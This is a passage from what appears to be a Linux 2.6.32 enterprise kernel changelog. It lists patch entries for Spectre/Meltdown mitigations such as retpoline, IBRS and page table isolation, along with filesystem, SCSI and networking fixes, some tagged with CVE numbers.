Anderson) [1405879]\n- [fs] proc: Resolve performance issues with multiple /proc/stat reads (Prarit Bhargava) [1544565]\n- [fs] nfs: fix pnfs direct write memory leak (Scott Mayhew) [1536900]\n- [fs] dcache: prevent multiple shrink_dcache_parent() on the same dentry (Miklos Szeredi) [1269288]\n- [fs] fifo: do not restart open() if it already found a partner (Miklos Szeredi) [1482983]\n- [audit] reinstate check for failed execve (Denys Vlasenko) [1488822]\n- [perf] x86/intel/uncore: Make PCI and MSR uncore independent (Jiri Olsa) [1427324]\n- [perf] fix perf_event_comm() vs. exec() assumption (Jiri Olsa) [1478980]\n- [lib] prevent BUG in kfree() due to memory exhaustion in __sg_alloc_table() (Larry Woodman) [1454453]\n- [kernel] sched/core: Rework rq->clock update skips (Lauro Ramos Venancio) [1212959]\n- [kernel] sched: Remove useless code in yield_to() (Lauro Ramos Venancio) [1212959]\n- [kernel] sched: Set skip_clock_update in yield_task_fair() (Lauro Ramos Venancio) [1212959]\n- [kernel] sched, rt: Update rq clock when unthrottling of an otherwise idle CPU (Lauro Ramos Venancio) [1212959]\n- [kernel] lockdep: Fix lock_is_held() on recursion (Lauro Ramos Venancio) [1212959]\n- [x86] skip check for spurious faults for non-present faults (Daniel Vacek) [1495167]\n- [x86] mm: Fix boot crash caused by incorrect loop count calculation in sync_global_pgds() (Daniel Vacek) [1495167]\n- [fs] gfs2: Defer deleting inodes under memory pressure (Andreas Grunbacher) [1255872]\n- [fs] gfs2: gfs2_clear_inode, gfs2_delete_inode: Put glocks asynchronously (Andreas Grunbacher) [1255872]\n- [fs] gfs2: Get rid of gfs2_set_nlink (Andreas Grunbacher) [1255872]\n- [fs] add set_nlink() (Andreas Grunbacher) [1255872]\n- [fs] gfs2: gfs2_glock_get: Wait on freeing glocks (Andreas Grunbacher) [1255872]\n- [fs] gfs2: gfs2_create_inode: Keep glock across iput (Andreas Grunbacher) [1255872]\n- [fs] gfs2: Clean up glock work enqueuing (Andreas Grunbacher) [1255872]\n- [fs] gfs2: Protect gl->gl_object by spin lock (Andreas Grunbacher) [1255872]\n- [fs] gfs2: Get rid of flush_delayed_work in gfs2_clear_inode (Andreas Grunbacher) [1255872]\n- [fs] revert 'gfs2: Wait for iopen glock dequeues' (Andreas Grunbacher) [1255872]\n- [fs] gfs2: Fixup to 'Clear gl_object if gfs2_create_inode fails' (Andreas Grunbacher) [1506281]\n- [scsi] dual scan thread bug fix (Ewan Milne) [1508512]\n- [scsi] fix our current target reap infrastructure (Ewan Milne) [1508512]\n- [scsi] bnx2fc: Fix check in SCSI completion handler for timed out request (Chad Dupuis) [1538168]\n[2.6.32-741]\n- [net] netfilter: xt_TCPMSS: add more sanity tests on tcph->doff (Florian Westphal) [1543091] {CVE-2017-18017}\n- [net] netfilter: xt_TCPMSS: fix handling of malformed TCP header and options (Florian Westphal) [1543091] {CVE-2017-18017}\n- [net] netfilter: xt_TCPMSS: SYN packets are allowed to contain data (Florian Westphal) [1543091] {CVE-2017-18017}\n- [net] sctp: return error if the asoc has been peeled off in sctp_wait_for_sndbuf (Hangbin Liu) [1470559]\n- [net] sctp: use the right sk after waking up from wait_buf sleep (Hangbin Liu) [1470559]\n- [net] sctp: do not free asoc when it is already dead in sctp_sendmsg (Hangbin Liu) [1470559]\n- [net] packet: Allow packets with only a header (but no payload) (Lorenzo Bianconi) [1535024]\n- [net] packet: make packet too small warning match condition (Lorenzo Bianconi) [1535024]\n- [net] packet: bail out of packet_snd() if L2 header creation fails (Lorenzo Bianconi) [1535024]\n- [net] packet: make packet_snd fail on len smaller than l2 header (Lorenzo Bianconi) [1535024]\n- [net] bonding: discard lowest hash bit for 802.3ad layer3+4 (Hangbin Liu) [1532167]\n- [net] revert 'net: use lib/percpu_counter API for fragmentation mem accounting' (Jesper Brouer) [1508504]\n- [scsi] lpfc: fix pci hot plug crash in list_add call (Dick Kennedy) [1542773]\n- [scsi] hpsa: update driver version (Joseph Szczypek) [1541517]\n- [scsi] hpsa: correct resets on retried commands (Joseph Szczypek) [1541517]\n- [scsi] hpsa: rescan later if reset in progress (Joseph Szczypek) [1541517]\n[2.6.32-740]\n- [x86] retpoline/hyperv: Convert assembler indirect jumps (Waiman Long) [1535645]\n- [x86] spec_ctrl: Upgrade GCC retpoline warning to an error for brew builds (Waiman Long) [1535645]\n- [x86] retpoline: Dont use kernel indirect thunks in vsyscalls (Waiman Long) [1535645]\n- [x86] spec_ctrl: Add a read-only retp_enabled debugfs knob (Waiman Long) [1535645]\n- [x86] spec_ctrl: detect unretpolined modules (Waiman Long) [1535645]\n- [x86] retpoline/ACPI: Convert indirect jump in wakeup code (Waiman Long) [1535645]\n- [x86] retpoline/efi: Convert stub indirect calls & jumps (Waiman Long) [1535645]\n- [watchdog] hpwdt: remove indirect call in drivers/watchdog/hpwdt.c (Waiman Long) [1535645]\n- [x86] spec_ctrl: cleanup __ptrace_may_access (Waiman Long) [1535645]\n- [x86] bugs: Drop one 'mitigation' from dmesg (Waiman Long) [1535645]\n- [x86] spec_ctrl: fix ptrace IBPB optimization (Waiman Long) [1535645]\n- [x86] spec_ctrl: Avoid returns in IBRS-disabled regions (Waiman Long) [1535645]\n- [x86] spectre/meltdown: avoid the vulnerability directory to weaken kernel security (Waiman Long) [1535645]\n- [x86] spec_ctrl: Update spec_ctrl.txt and kernel-parameters.txt (Waiman Long) [1535645]\n- [x86] Use IBRS for firmware update path (Waiman Long) [1535645]\n- [x86] spec_ctrl: stuff RSB on context switch with SMEP enabled (Waiman Long) [1535645]\n- [x86] spec_ctrl: use upstream RSB stuffing function (Waiman Long) [1535645]\n- [x86] spec_ctrl: add ibrs_enabled=3 (ibrs_user) (Waiman Long) [1535645]\n- [x86] spec_ctrl: Integrate IBRS with retpoline (Waiman Long) [1535645]\n- [x86] spec_ctrl: print features changed by microcode loading (Waiman Long) [1535645]\n- [x86] spec_ctrl: refactor the init and microcode loading paths (Waiman Long) [1535645]\n- [x86] spec_ctrl: move initialization of X86_FEATURE_IBPB_SUPPORT (Waiman Long) [1535645]\n- [x86] spec_ctrl: remove SPEC_CTRL_PCP_IBPB bit (Waiman Long) [1535645]\n- [x86] spec_ctrl: remove ibrs_enabled variable (Waiman Long) [1535645]\n- [x86] spec_ctrl: add ibp_disabled variable (Waiman Long) [1535645]\n- [x86] spec_ctrl: add X86_FEATURE_IBP_DISABLE (Waiman Long) [1535645]\n- [x86] spec_ctrl: remove IBP disable for AMD model 0x16 (Waiman Long) [1535645]\n- [x86] spec_ctrl: remove performance measurements from documentation (Waiman Long) [1535645]\n- [x86] spec_ctrl: make ipbp_enabled read-only (Waiman Long) [1535645]\n- [x86] spec_ctrl: remove ibpb_enabled=2 mode (Waiman Long) [1535645]\n- [x86] spec_ctrl: Enable spec_ctrl functions for x86-32 (Waiman Long) [1535645]\n- [x86] spec_ctrl: move vmexit rmb in the last branch before IBRS (Waiman Long) [1535645]\n- [x86] spec_ctrl: satisfy the barrier like semantics of IBRS (Waiman Long) [1535645]\n- [x86] spectre_v1: Mark it as mitigated (Waiman Long) [1535645]\n- [x86] pti: Do not enable PTI on CPUs which are not vulnerable to Meltdown (Waiman Long) [1535645]\n- [x86] mce: Make machine check speculation protected (Waiman Long) [1535645]\n- [x86] retpoline: Add LFENCE to the retpoline/RSB filling RSB macros (Waiman Long) [1535645]\n- [x86] retpoline: Fill return stack buffer on vmexit (Waiman Long) [1535645]\n- [x86] retpoline/irq32: Convert assembler indirect jumps (Waiman Long) [1535645]\n- [x86] retpoline/checksum32: Convert assembler indirect jumps (Waiman Long) [1535645]\n- [x86] retpoline/entry: Convert entry assembler indirect (Waiman Long) [1535645]\n- [x86] retpoline/crypto: Convert crypto assembler indirect jumps (Waiman Long) [1535645]\n- [x86] spectre: Add boot time option to select Spectre v2 mitigation (Waiman Long) [1535645]\n- [x86] retpoline: Add initial retpoline support (Waiman Long) [1535645]\n- [x86] cpu: Implement CPU vulnerabilites sysfs functions (Waiman Long) [1535645]\n- [base] sysfs/cpu: Add vulnerability folder (Waiman Long) [1535645]\n- [x86] cpufeatures: Add X86_BUG_SPECTRE_V(12) (Waiman Long) [1535645]\n- [x86] pti: Add the pti= cmdline option and documentation (Waiman Long) [1535645]\n- [x86] cpufeatures: Add X86_BUG_CPU_MELTDOWN (Waiman Long) [1535645]\n- [x86] pti: Rename CONFIG_KAISER to CONFIG_PAGE_TABLE_ISOLATION (Waiman Long) [1535645]\n- [x86] cpu: Expand cpufeature facility to include cpu bugs (Waiman Long) [1535645]\n- [x86] cpu: Merge bugs.c and bugs_64.c (Waiman Long) [1535645]\n- [x86] cpu/intel: Introduce macros for Intel family numbers (Waiman Long) [1535645]\n- [x86] alternatives: Add missing 'n' at end of ALTERNATIVE inline asm (Waiman Long) [1535645]\n- [x86] alternatives: Fix alt_max_short macro to really be a max() (Waiman Long) [1535645]\n- [x86] asm: Make asm/alternative.h safe from assembly (Waiman Long) [1535645]\n- [x86] alternatives: Document macros (Waiman Long) [1535645]\n- [x86] alternatives: Fix ALTERNATIVE_2 padding generation properly (Waiman Long) [1535645]\n- [x86] alternatives: Add instruction padding (Waiman Long) [1535645]\n- [x86] alternative: Add header guards to asm/alternative-asm.h (Waiman Long) [1535645]\n- [x86] alternative: Use .pushsection/.popsection (Waiman Long) [1535645]\n- [x86] copy_user_generic: Optimize copy_user_generic with CPU erms feature (Waiman Long) [1535645]\n- [x86] Make .altinstructions bit size neutral (Waiman Long) [1535645]\n[2.6.32-739]\n- [powerpc] spinlock: add gmb memory barrier (Mauricio Oliveira) [1538543]\n- [powerpc] prevent Meltdown attack with L1-D$ flush (Mauricio Oliveira) [1538543]\n- [s390] vtime: turn BP on when going idle (Hendrik Brueckner) [1538542]\n- [s390] cpuinfo: show facilities as reported by stfle (Hendrik Brueckner) [1538542]\n- [s390] kconfigs: turn off SHARED_KERNEL support for s390 (Hendrik Brueckner) [1538542]\n- [s390] add ppa to system call and program check path (Hendrik Brueckner) [1538542]\n- [s390] spinlock: add gmb memory barrier (Hendrik Brueckner) [1538542]\n- [s390] introduce CPU alternatives (Hendrik Brueckner) [1538542]\n[2.6.32-738]\n- [x86] pti: Rework the trampoline stack switching code (Waiman Long) [1519802] {CVE-2017-5754}\n- [x86] pti: Disable interrupt before trampoline stack switching (Waiman Long) [1519802] {CVE-2017-5754}\n- [x86] pti/mm: Fix trampoline stack problem with XEN PV (Waiman Long) [1519802] {CVE-2017-5754}\n- [x86] kaiser/efi: unbreak tboot (Waiman Long) [1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: Fix XEN PV boot failure (Waiman Long) [1519802] {CVE-2017-5754}\n- [x86] entry: Invoke TRACE_IRQS_IRETQ in paranoid_userspace_restore_all (Waiman Long) [1519802] {CVE-2017-5754}\n- [x86] spec_ctrl: show added cpuid flags in /proc/cpuinfo after late microcode update (Waiman Long) [1519796] {CVE-2017-5715}\n- [x86] spec_ctrl: svm: spec_ctrl at vmexit needs per-cpu areas functional (Waiman Long) [1519796] {CVE-2017-5715}\n- [x86] spec_ctrl: Eliminate redundnat FEATURE Not Present messages (Waiman Long) [1519796] {CVE-2017-5715}\n- [x86] spec_ctrl: enable IBRS and stuff_RSB before calling NMI C code (Waiman Long) [1519796] {CVE-2017-5715}\n- [x86] spec_ctrl: skip CAP_SYS_PTRACE check to skip audit (Waiman Long) [1519796] {CVE-2017-5715}\n- [x86] spec_ctrl: disable ibrs while in intel_idle() (Waiman Long) [1519796] {CVE-2017-5715}\n- [x86] spec_ctrl: skip IBRS/CR3 restore when paranoid exception returns to userland (Waiman Long) [1519796] {CVE-2017-5715}\n- [x86] Revert 'entry: Use retpoline for syscalls indirect calls' (Waiman Long) [1519796] {CVE-2017-5715}\n- [x86] mm/dump_pagetables: Allow dumping current pagetables (Waiman Long) [1519802] {CVE-2017-5754}\n- [x86] mm/dump_pagetables: Add a pgd argument to walk_pgd_level() (Waiman Long) [1519802] {CVE-2017-5754}\n- [x86] mm/dump_pagetables: Add page table directory (Waiman Long) [1519802] {CVE-2017-5754}\n- [x86] entry: Remove unneeded nmi_userspace code (Waiman Long) [1519802] {CVE-2017-5754}\n- [x86] entry: Fix nmi exit code with CONFIG_TRACE_IRQFLAGS (Waiman Long) [1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: init_tss is supposed to go in the PAGE_ALIGNED per-cpu section (Waiman Long) [1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: Clear kdump pgd page to prevent incorrect behavior (Waiman Long) [1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: consider the init_mm.pgd a kaiser pgd (Waiman Long) [1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: convert userland visible 'kpti' name to 'pti' (Waiman Long) [1519802] {CVE-2017-5754}\n- [x86] spec_ctrl: set IBRS during resume from RAM if ibrs_enabled is 2 (Waiman Long) [1519796] {CVE-2017-5715}\n- [x86] mm/kaiser: __load_cr3 in resume from RAM after kernel gs has been restored (Waiman Long) [1519796] {CVE-2017-5715}\n- [x86] mm/kaiser: Revert the __GFP_COMP flag change (Waiman Long) [1519802] {CVE-2017-5754}\n- [x86] entry: Fix paranoid_exit() trampoline clobber (Waiman Long) [1519802] {CVE-2017-5754}\n- [x86] spec_ctrl: allow use_ibp_disable only if both SPEC_CTRL and IBPB_SUPPORT are missing (Waiman Long) [1519796] {CVE-2017-5715}\n- [x86] spec_ctrl: Documentation spec_ctrl.txt (Waiman Long) [1519796] {CVE-2017-5715}\n- [x86] spec_ctrl: remove irqs_disabled() check from intel_idle() (Waiman Long) [1519796] {CVE-2017-5715}\n- [x86] spec_ctrl: use enum when setting ibrs/ibpb_enabled (Waiman Long) [1519796] {CVE-2017-5715}\n- [x86] spec_ctrl: undo speculation barrier for ibrs_enabled and noibrs_cmdline (Waiman Long) [1519796] {CVE-2017-5715}\n- [x86] spec_ctrl: introduce ibpb_enabled = 2 for IBPB instead of IBRS (Waiman Long) [1519796] {CVE-2017-5715}\n- [x86] spec_ctrl: introduce SPEC_CTRL_PCP_ONLY_IBPB (Waiman Long) [1519796] {CVE-2017-5715}\n- [x86] spec_ctrl: cleanup s/flush/sync/ naming when sending IPIs (Waiman Long) [1519796] {CVE-2017-5715}\n- [x86] spec_ctrl: set IBRS during CPU init if in ibrs_enabled == 2 (Waiman Long) [1519796] {CVE-2017-5715}\n- [x86] spec_ctrl: use IBRS_ENABLED instead of 1 (Waiman Long) [1519796] {CVE-2017-5715}\n- [x86] spec_ctrl: allow the IBP disable feature to be toggled at runtime (Waiman Long) [1519796] {CVE-2017-5715}\n- [x86] spec_ctrl: always initialize save_reg in ENABLE_IBRS_SAVE_AND_CLOBBER (Waiman Long) [1519796] {CVE-2017-5715}\n- [x86] spec_ctrl: ibrs_enabled() is expected to return > 1 (Waiman Long) [1519796] {CVE-2017-5715}\n- [x86] spec_ctrl: CLEAR_EXTRA_REGS and extra regs save/restore (Waiman Long) [1519796] {CVE-2017-5715}\n- [x86] syscall: Clear unused extra registers on syscall (Waiman Long) [1519796] {CVE-2017-5715}\n- [x86] entry: Add back STUFF_RSB to interrupt and error paths (Waiman Long) [1519796] {CVE-2017-5715}\n- [x86] mm/kaiser: make is_kaiser_pgd reliable (Waiman Long) [1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: disable global pages by default with KAISER (Waiman Long) [1519802] {CVE-2017-5754}\n- [x86] Revert 'mm/kaiser: Disable global pages by default with KAISER' (Waiman Long) [1519802] {CVE-2017-5754}\n- [x86] kaiser/mm: fix pgd freeing in error path (Waiman Long) [1519802] {CVE-2017-5754}\n- [x86] entry: Fix 32-bit program crash with 64-bit kernel on AMD boxes (Waiman Long) [1519796] {CVE-2017-5715}\n- [x86] spec_ctrl: reload spec_ctrl cpuid in all microcode load paths (Waiman Long) [1519796] {CVE-2017-5715}\n- [x86] spec_ctrl: Prevent unwanted speculation without IBRS (Waiman Long) [1519796] {CVE-2017-5715}\n- [x86] spec_ctrl: add noibrs noibpb boot options (Waiman Long) [1519796] {CVE-2017-5715}\n- [x86] entry: Use retpoline for syscalls indirect calls (Waiman Long) [1519796] {CVE-2017-5715}\n- [x86] syscall: Clear unused extra registers on 32-bit compatible syscall entrance (Waiman Long) [1519796] {CVE-2017-5715}\n- [x86] spec_ctrl: rescan cpuid after a late microcode update (Waiman Long) [1519796] {CVE-2017-5715}\n- [x86] spec_ctrl: add debugfs ibrs_enabled ibpb_enabled (Waiman Long) [1519796] {CVE-2017-5715}\n- [x86] spec_ctrl: consolidate the spec control boot detection (Waiman Long) [1519796] {CVE-2017-5715}\n- [x86] Remove __cpuinitdata from some data & function (Waiman Long) [1519796] {CVE-2017-5715}\n- [x86] KVM/spec_ctrl: allow IBRS to stay enabled in host userland (Waiman Long) [1519796] {CVE-2017-5715}\n- [x86] spec_ctrl: move stuff_RSB in spec_ctrl.h (Waiman Long) [1519796] {CVE-2017-5715}\n- [x86] entry: Remove STUFF_RSB in error and interrupt code (Waiman Long) [1519796] {CVE-2017-5715}\n- [x86] entry: Stuff RSB for entry to kernel for non-SMEP platform (Waiman Long) [1519796] {CVE-2017-5715}\n- [x86] mm: Only set IBPB when the new thread cannot ptrace (Waiman Long) [1519796] {CVE-2017-5715}\n- [x86] mm: Set IBPB upon context switch (Waiman Long) [1519796] {CVE-2017-5715}\n- [x86] idle: Disable IBRS when offlining cpu and re-enable (Waiman Long) [1519796] {CVE-2017-5715}\n- [x86] idle: Disable IBRS entering idle and enable it on wakeup (Waiman Long) [1519796] {CVE-2017-5715}\n- [x86] spec_ctrl: implement spec ctrl C methods (Waiman Long) [1519796] {CVE-2017-5715}\n- [x86] spec_ctrl: save IBRS MSR value in save_paranoid for NMI (Waiman Long) [1519796] {CVE-2017-5715}\n- [x86] enter: Use IBRS on syscall and interrupts (Waiman Long) [1519796] {CVE-2017-5715}\n- [x86] spec_ctrl: swap rdx with rsi for nmi nesting detection (Waiman Long) [1519796] {CVE-2017-5715}\n- [x86] spec_ctrl: spec_ctrl_pcp and kaiser_enabled_pcp in same cachline (Waiman Long) [1519796] {CVE-2017-5715}\n- [x86] spec_ctrl: use per-cpu knob instead of ALTERNATIVES for ibpb and ibrs (Waiman Long) [1519796] {CVE-2017-5715}\n- [x86] enter: MACROS to set/clear IBRS and set IBPB (Waiman Long) [1519796] {CVE-2017-5715}\n- [kvm] x86: add SPEC_CTRL to MSR and CPUID lists (Waiman Long) [1519796] {CVE-2017-5715}\n- [kvm] svm: add MSR_IA32_SPEC_CTRL and MSR_IA32_PRED_CMD (Waiman Long) [1519796] {CVE-2017-5715}\n- [x86] svm: Set IBPB when running a different VCPU (Waiman Long) [1519796] {CVE-2017-5715}\n- [kvm] vmx: add MSR_IA32_SPEC_CTRL and MSR_IA32_PRED_CMD (Waiman Long) [1519796] {CVE-2017-5715}\n- [kvm] vmx: Set IBPB when running a different VCPU (Waiman Long) [1519796] {CVE-2017-5715}\n- [kvm] x86: clear registers on VM exit (Waiman Long) [1519796] {CVE-2017-5715}\n- [x86] kvm: Pad RSB on VM transition (Waiman Long) [1519796] {CVE-2017-5715}\n- [security] Add SPEC_CTRL Kconfig option (Waiman Long) [1519796] {CVE-2017-5715}\n- [x86] cpu/AMD: Control indirect branch predictor when SPEC_CTRL not available (Waiman Long) [1519796] {CVE-2017-5715}\n- [x86] feature: Report presence of IBPB and IBRS control (Waiman Long) [1519796] {CVE-2017-5715}\n- [x86] feature: Enable the x86 feature to control Speculation (Waiman Long) [1519796] {CVE-2017-5715}\n- [x86] cpuid: Provide get_scattered_cpuid_leaf() (Waiman Long) [1519796] {CVE-2017-5715}\n- [x86] cpuid: Cleanup cpuid_regs definitions (Waiman Long) [1519796] {CVE-2017-5715}\n- [x86] microcode: Share native MSR accessing variants (Waiman Long) [1519796] {CVE-2017-5715}\n- [x86] nop: Make the ASM_NOP* macros work from assembly (Waiman Long) [1519796] {CVE-2017-5715}\n- [x86] cpu: Clean up and unify the NOP selection infrastructure (Waiman Long) [1519796] {CVE-2017-5715}\n- [x86] entry: Further simplify the paranoid_exit code (Waiman Long) [1519802] {CVE-2017-5754}\n- [x86] entry: Remove trampoline check from paranoid entry path (Waiman Long) [1519802] {CVE-2017-5754}\n- [x86] entry: Dont switch to trampoline stack in paranoid_exit (Waiman Long) [1519802] {CVE-2017-5754}\n- [x86] entry: Simplify trampoline stack restore code (Waiman Long) [1519802] {CVE-2017-5754}\n- [misc] locking/barriers: prevent speculative execution based on Coverity scan results (Waiman Long) [1519789] {CVE-2017-5753}\n- [fs] udf: prevent speculative execution (Waiman Long) [1519789] {CVE-2017-5753}\n- [fs] prevent speculative execution (Waiman Long) [1519789] {CVE-2017-5753}\n- [scsi] qla2xxx: prevent speculative execution (Waiman Long) [1519789] {CVE-2017-5753}\n- [netdrv] p54: prevent speculative execution (Waiman Long) [1519789] {CVE-2017-5753}\n- [netdrv] carl9170: prevent speculative execution (Waiman Long) [1519789] {CVE-2017-5753}\n- [media] uvcvideo: prevent speculative execution (Waiman Long) [1519789] {CVE-2017-5753}\n- [x86] cpu/AMD: Remove now unused definition of MFENCE_RDTSC feature (Waiman Long) [1519789] {CVE-2017-5753}\n- [x86] cpu/AMD: Make the LFENCE instruction serialized (Waiman Long) [1519789] {CVE-2017-5753}\n- [kernel] locking/barriers: introduce new memory barrier gmb() (Waiman Long) [1519789] {CVE-2017-5753}\n- [x86] Fix typo preventing msr_set/clear_bit from having an effect (Waiman Long) [1519789] {CVE-2017-5753}\n- [x86] Add another set of MSR accessor functions (Waiman Long) [1519789] {CVE-2017-5753}\n- [x86] mm/kaiser: Replace kaiser with kpti to sync with upstream (Waiman Long) [1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: map the trace idt tables in userland shadow pgd (Waiman Long) [1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: add 'kaiser' and 'nokaiser' boot options (Waiman Long) [1519802] {CVE-2017-5754}\n- [x86] kaiser/mm: fix RESTORE_CR3 crash in kaiser_stop_machine (Waiman Long) [1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: use stop_machine for enable/disable knob (Waiman Long) [1519802] {CVE-2017-5754}\n- [x86] kaiser/mm: use atomic ops to poison/unpoison user pagetables (Waiman Long) [1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: use invpcid to flush the two kaiser PCID AISD (Waiman Long) [1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: use two PCID ASIDs optimize the TLB during enter/exit kernel (Waiman Long) [1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: stop patching flush_tlb_single (Waiman Long) [1519802] {CVE-2017-5754}\n- [x86] mm: If INVPCID is available, use it to flush global mappings (Waiman Long) [1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: use PCID feature to make user and kernel switches faster (Waiman Long) [1519802] {CVE-2017-5754}\n- [x86] mm/64: Initialize CR4.PCIDE early (Waiman Long) [1519802] {CVE-2017-5754}\n- [x86] mm: Add a 'noinvpcid' boot option to turn off INVPCID (Waiman Long) [1519802] {CVE-2017-5754}\n- [x86] mm: Add the 'nopcid' boot option to turn off PCID (Waiman Long) [1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: validate trampoline stack (Waiman Long) [1519802] {CVE-2017-5754}\n- [x86] entry: Move SYSENTER_stack to the beginning of struct tss_struct (Waiman Long) [1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: isolate the user mapped per cpu areas (Waiman Long) [1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: enable kaiser in build (Waiman Long) [1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: selective boot time defaults (Waiman Long) [1519802] {CVE-2017-5754}\n- [x86] mm/kaiser/xen: Dynamically disable KAISER when running under Xen PV (Waiman Long) [1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: add Kconfig (Waiman Long) [1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: avoid false positives during non-kaiser pgd updates (Waiman Long) [1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: Respect disabled CPU features (Waiman Long) [1519802] {CVE-2017-5754}\n- [x86] kaiser/mm: trampoline stack comments (Waiman Long) [1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: stack trampoline (Waiman Long) [1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: re-enable vsyscalls (Waiman Long) [1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: allow to build KAISER with KASRL (Waiman Long) [1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: allow KAISER to be enabled/disabled at runtime (Waiman Long) [1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: un-poison PGDs at runtime (Waiman Long) [1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: add a function to check for KAISER being enabled (Waiman Long) [1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: add debugfs file to turn KAISER on/off at runtime (Waiman Long) [1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: disable native VSYSCALL (Waiman Long) [1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: map virtually-addressed performance monitoring buffers (Waiman Long) [1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: add kprobes text section (Waiman Long) [1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: map trace interrupt entry (Waiman Long) [1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: map entry stack per-cpu areas (Waiman Long) [1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: map dynamically-allocated LDTs (Waiman Long) [1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: make sure static PGDs are 8k in size (Waiman Long) [1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: allow NX poison to be set in p4d/pgd (Waiman Long) [1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: unmap kernel from userspace page tables (core patch) (Waiman Long) [1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: mark per-cpu data structures required for entry/exit (Waiman Long) [1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: introduce user-mapped per-cpu areas (Waiman Long) [1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: add cr3 switches to entry code (Waiman Long) [1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: remove scratch registers (Waiman Long) [1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: prepare assembly for entry/exit CR3 switching (Waiman Long) [1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: Disable global pages by default with KAISER (Waiman Long) [1519802] {CVE-2017-5754}\n- [x86] mm: Document X86_CR4_PGE toggling behavior (Waiman Long) [1519802] {CVE-2017-5754}\n- [x86] mm/tlb: Make CR4-based TLB flushes more robust (Waiman Long) [1519802] {CVE-2017-5754}\n- [x86] mm: Do not set _PAGE_USER for init_mm page tables (Waiman Long) [1519802] {CVE-2017-5754}\n- [x86] increase robusteness of bad_iret fixup handler (Waiman Long) [1519802] {CVE-2017-5754}\n- [x86] mm: Check if PUD is large when validating a kernel address (Waiman Long) [1519802] {CVE-2017-5754}\n- [x86] Separate out entry text section (Waiman Long) [1519802] {CVE-2017-5754}\n- [include] linux/const.h: Add _BITUL() and _BITULL() (Waiman Long) [1519802] {CVE-2017-5754}\n- [include] linux/mmdebug.h: add VM_WARN_ON() and VM_WARN_ON_ONCE() (Waiman Long) [1519802] {CVE-2017-5754}\n- [include] stddef.h: Move offsetofend() from vfio.h to a generic kernel header (Waiman Long) [1519802] {CVE-2017-5754}\n[2.6.32-737]\n- [hv] netvsc: get rid of completion timeouts (Vitaly Kuznetsov) [1538592]\n- [fs] gfs2: Special case the rindex in gfs2_write_alloc_required() (Andrew Price) [1384184]\n- [scsi] scsi_dh_alua: fix race condition that causes multipath to hang (Mike Snitzer) [1500192]\n- [virtio] virtio-pci: fix leaks of msix_affinity_masks (Jason Wang) [1281754]\n- [fs] sunrpc: avoid warning in gss_key_timeout (J. Bruce Fields) [1456594]\n- [fs] sunrpc: fix RCU handling of gc_ctx field (J. Bruce Fields) [1456594]\n[2.6.32-736]\n- [drm] nouveau/disp/nv50-: execute supervisor on its own workqueue (Ben Skeggs) [1468825]\n- [net] bluetooth: Prevent uninitialized data (Gopal Tiwari) [1519626] {CVE-2017-1000410}\n- [scsi] storvsc: do not assume SG list is continuous when doing bounce buffers (for 4.1 and prior) (Cathy Avery) [1533175]\n[2.6.32-735]\n- [x86] tighten /dev/mem with zeroing reads (Bruno Eduardo de Oliveira Meneguele) [1449676] {CVE-2017-7889}\n- [char] /dev/mem: make size_inside_page() logic straight (Bruno Eduardo de Oliveira Meneguele) [1449676] {CVE-2017-7889}\n- [char] /dev/mem: cleanup unxlate_dev_mem_ptr() calls (Bruno Eduardo de Oliveira Meneguele) [1449676] {CVE-2017-7889}\n- [char] /dev/mem: introduce size_inside_page() (Bruno Eduardo de Oliveira Meneguele) [1449676] {CVE-2017-7889}\n- [char] /dev/mem: remove redundant test on len (Bruno Eduardo de Oliveira Meneguele) [1449676] {CVE-2017-7889}\n- [scsi] lpfc: Null pointer dereference when log_verbose is set to 0xffffffff (Dick Kennedy) [1538340]\n[2.6.32-734]\n- [netdrv] bnx2x: prevent crash when accessing PTP with interface down (Michal Schmidt) [1518669]\n- [hv] vss: Operation timeouts should match host expectation (Mohammed Gamal) [1511431]\n- [hv] utils: reduce HV_UTIL_NEGO_TIMEOUT timeout (Mohammed Gamal) [1511431]\n- [hv] utils: Check VSS daemon is listening before a hot backup (Mohammed Gamal) [1511431]\n- [hv] utils: Continue to poll VSS channel after handling requests (Mohammed Gamal) [1511431]\n- [md] dm: clear all discard attributes in queue_limits when discards are disabled (Mike Snitzer) [1433297]\n- [md] dm: discard support requires all targets in a table support discards (Mike Snitzer) [1433297]\n- [net] dccp: use-after-free in DCCP code (Stefano Brivio) [1520817] {CVE-2017-8824}\n- [net] tcp: fix tcp_trim_head() (Paolo Abeni) [1274139]\n- [net] 